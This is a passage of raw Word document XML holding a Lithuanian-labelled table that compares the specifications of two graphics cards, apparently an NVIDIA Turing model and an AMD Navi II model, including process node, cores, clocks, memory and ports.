          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07D6997B" w14:textId="7572CFD9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Technologija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3660B1E6" w14:textId="6B2FC9FA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">12nm </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D999709" w14:textId="2B89AC55" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7nm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2673FB30" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BB8F80D" w14:textId="22223001" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Architektūra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B8D07B4" w14:textId="4BDA33C0" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Turing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="13192F0E" w14:textId="46254C48" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Navi II</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0374FA19" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2CB50A90" w14:textId="2627F148" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Tranzistorių kiekis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7FD17C8F" w14:textId="5FE29645" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>18,600 mil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3A60D68F" w14:textId="0441FC36" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>26,800 mil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="087D925B" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4391F719" w14:textId="3B1B8E55" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Branduolių skaičius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E6B39CF" w14:textId="70199965" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>NVIDIA CUDA cores 4352</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="415FDF07" w14:textId="0DAF893A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4608</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="535B56B0" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6078B8C8" w14:textId="3729EDD6" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kitų branduolių</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EFD903E" w14:textId="3E81BF6E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>RT cores 78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="77C8346F" w14:textId="43692623" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>RT cores 72</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="75C5425D" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45A59BA1" w14:textId="7946CA91" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Taktinis dažnis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340F4B04" w14:textId="58409DB5" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/boost clock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0DAA6E07" w14:textId="22F86062" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1350/ 1635 (OC) MHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="606FEFCF" w14:textId="1748E2DA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2015/2250 (OC) MHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1C91F074" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:trHeight w:val="600"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4995B279" w14:textId="76C31496" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Magistralė PCI Express 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1BD13504" w14:textId="37769B60" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 3.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38855A1B" w14:textId="7B51A4AF" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PCIe 4.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4627455F" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="40B94830" w14:textId="625756B7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties greitis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="06D35677" w14:textId="6BB11E6E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>14 Gbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="399CF5F4" w14:textId="34C3FE81" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16 Gbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="305C3CD6" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E2EC1D0" w14:textId="46CEAC54" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties standartas ir talpa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3D05C054" w14:textId="271B336D" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>11 GB GDDR6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D7B7368" w14:textId="05DFCBEB" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16 GB GDDR6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="012FACEF" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="623C414D" w14:textId="3B999C23" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties magistralė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AE62CD0" w14:textId="15D3F722" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>352 bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32F7BFF2" w14:textId="228CA047" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>256 bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1065B743" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02FA701D" w14:textId="221BB3AF" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atminties pralaidumas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7F3975E2" w14:textId="4EDA226A" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>616GB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7096ABF4" w14:textId="1C58AB22" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>512.0 GB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1B727715" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4B5F0499" w14:textId="64F5C868" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lizdai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="74B79E98" w14:textId="7CE66593" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DisplayPort, HDMI, USB Type-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0ECAD2B1" w14:textId="11161C74" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1x HDMI</w:t>
            </w:r>
          </w:p>
